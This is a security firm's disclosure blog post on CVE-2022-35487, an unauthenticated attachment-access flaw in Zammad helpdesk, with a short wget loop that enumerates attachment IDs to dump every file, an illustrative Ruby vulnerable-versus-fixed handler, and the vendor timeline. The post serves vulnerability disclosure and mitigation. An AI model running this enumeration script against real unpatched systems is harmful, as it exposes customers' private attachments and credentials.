During a security test at one of our customers, we came across a web application with integrated helpdesk software. In the course of that test, we identified a critical zero-day vulnerability in Zammad, the helpdesk software in use. The vulnerability existed because Zammad did not perform authorization correctly for certain attachment endpoints. It allowed an unauthenticated attacker to gain access to all ticket attachments, such as pictures, emails, or other attached files. In this blog post, we describe how the vulnerability was identified and exploited, and what caused it.
UPDATE 12.08.2022: The vulnerability now has an official CVE: CVE-2022-35487
Contents
- Background knowledge
- Mapping the Attack Surface
- Exploiting the Vulnerability (Dumping Everything)
- Identifying the Source of the Vulnerability and Mitigation
- Vendor Response
1. Background knowledge
Many companies use some type of helpdesk to handle support requests, both in-house and from end users. We will show how the zero-day vulnerability was identified during our security audit and how far exploitation of this vulnerability is possible.
2. Mapping the Attack Surface
Zammad is usually protected by authentication that prevents unauthorized users from viewing its contents. In some cases, however, authentication is not required for certain content; the helpdesk logo loaded on the main page, for example, must also be available to unauthenticated users. During testing, we identified several endpoints in the application that were accessible to an unauthenticated user. Among them were endpoints that could be reached freely through the application's API path. Any user could interact with the "get attachment" call through the endpoint /api/v1/attachments/:id. We also noticed that this API path only requires an ID to access a ticket attachment. Since the IDs are numeric and consecutive, this allowed us to create a complete dump of the ticket attachments simply by iterating over the ID range.
The vulnerability therefore allows an unauthenticated user to download the helpdesk software's ticket attachments and view their contents. We were furthermore able to obtain internal information about the customer's infrastructure, as well as user credentials and employee email addresses. With this information, an attacker can carry out more advanced attacks. Potential attack vectors in this case would be social engineering attacks such as phishing, or bypassing authentication procedures using the credentials found in the attachments.
3. Exploiting the Vulnerability (Dumping Everything)
The following snippet shows the exploit that made it possible to dump the ticket attachments. It consists of a loop that requests the attachment endpoint for every ID from 1 to 1,000,000; wget stores each successful response in the current directory under the ID as its file name, while non-existent IDs simply return an error and produce no file. A complete dump of the attachments could be created this way.
#!/bin/sh
# Enumerate the unauthenticated attachment endpoint over the consecutive ID range.
# No session cookie or token is sent: the request is made as an anonymous user.
for i in $(seq 1 1000000)
do
wget "https://target.zammad.com/api/v1/attachments/$i"
done
4. Identifying the Source of the Vulnerability and Mitigation
The next step was to develop a corresponding mitigation for the identified security vulnerability. For this purpose, we analyzed the source code of the open source software. The code responsible for the leak was identified in the file /app/controllers/attachments_controller.rb: the attachment action could be reached without the authentication and authorization checks that protect the rest of the ticket data.
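To make the class of bug concrete, the following is an added example written for this post; it is not Zammad's code and does not reproduce attachments_controller.rb. It models a Rails-style attachment action as a plain Ruby method and contrasts a handler that serves any attachment by ID without looking at the session (the pattern that allowed the dump above) with a corrected handler that first requires an authenticated session and then authorizes the caller against the ticket owning the attachment. The data model (tickets with a customer, attachments belonging to a ticket, sessions with a user ID and an agent flag) and all names are hypothetical, and the sample records are constructed for the example.

```ruby
# Added example, not Zammad's code: missing-authorization pattern versus a
# hardened handler for a "get attachment by id" action.

# Constructed sample data (hypothetical): two tickets owned by different
# customers, each with one attachment.
ATTACHMENTS = {
  1 => { ticket_id: 10, filename: 'invoice.pdf', body: '%PDF-1.4 ...' },
  2 => { ticket_id: 20, filename: 'notes.txt',   body: 'vpn user: admin / pass: ...' },
}.freeze

TICKETS = {
  10 => { customer_id: 100 },
  20 => { customer_id: 200 },
}.freeze

Response = Struct.new(:status, :body)

# A session is a hash like { user_id: 100, agent: false }, or nil when the
# request carries no valid session (anonymous caller).

# Vulnerable: the only check is "does the record exist". The session is never
# consulted, so an anonymous caller can walk the consecutive id range.
def vulnerable_show(_session, id)
  att = ATTACHMENTS[id]
  return Response.new(404, 'not found') unless att

  Response.new(200, att[:body])
end

# Fixed: authenticate first, then authorize against the owning ticket.
def fixed_show(session, id)
  # 1. Authentication: reject anonymous callers before touching any data.
  return Response.new(401, 'authentication required') if session.nil?

  att = ATTACHMENTS[id]
  # 2. Object-level authorization. Return the same 404 for "does not exist"
  #    and "not yours" so the id space cannot be probed for valid ids.
  return Response.new(404, 'not found') unless att

  ticket = TICKETS[att[:ticket_id]]
  authorized = session[:agent] == true ||
               (ticket && ticket[:customer_id] == session[:user_id])
  return Response.new(404, 'not found') unless authorized

  Response.new(200, att[:body])
end

# The attacker's loop from the exploit section, as a function: try every id
# and return the ids that yielded a 200 for the given session.
def enumerate_attachments(handler, session, max_id)
  (1..max_id).select { |id| handler.call(session, id).status == 200 }
end

if __FILE__ == $PROGRAM_NAME
  puts "anonymous vs vulnerable handler: #{enumerate_attachments(method(:vulnerable_show), nil, 5)}"
  puts "anonymous vs fixed handler:      #{enumerate_attachments(method(:fixed_show), nil, 5)}"
  puts "customer 100 vs fixed handler:   #{enumerate_attachments(method(:fixed_show), { user_id: 100, agent: false }, 5)}"
end
```

Run as a script, the vulnerable handler hands the anonymous loop every attachment, while the fixed handler yields nothing to an anonymous caller and only the caller's own ticket attachments to a customer. The point of the uniform 404 in the fixed handler is that an authenticated but unauthorized user cannot distinguish "no such attachment" from "somebody else's attachment", which removes the second enumeration oracle that an authorization check alone would leave open.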
5. Vendor Response
Our consultants reported the vulnerability to the vendor of the helpdesk software immediately, on June 24, 2022. The vendor patched the vulnerability on July 5, 2022 (version 5.2.1). The security patch ensures that an unauthenticated user is no longer able to retrieve the attachments of the Zammad helpdesk application.
For those who are interested, this is the vendor's Git commit that fixes the vulnerability.
The publication of the vulnerability can be found at Zammad's advisories page.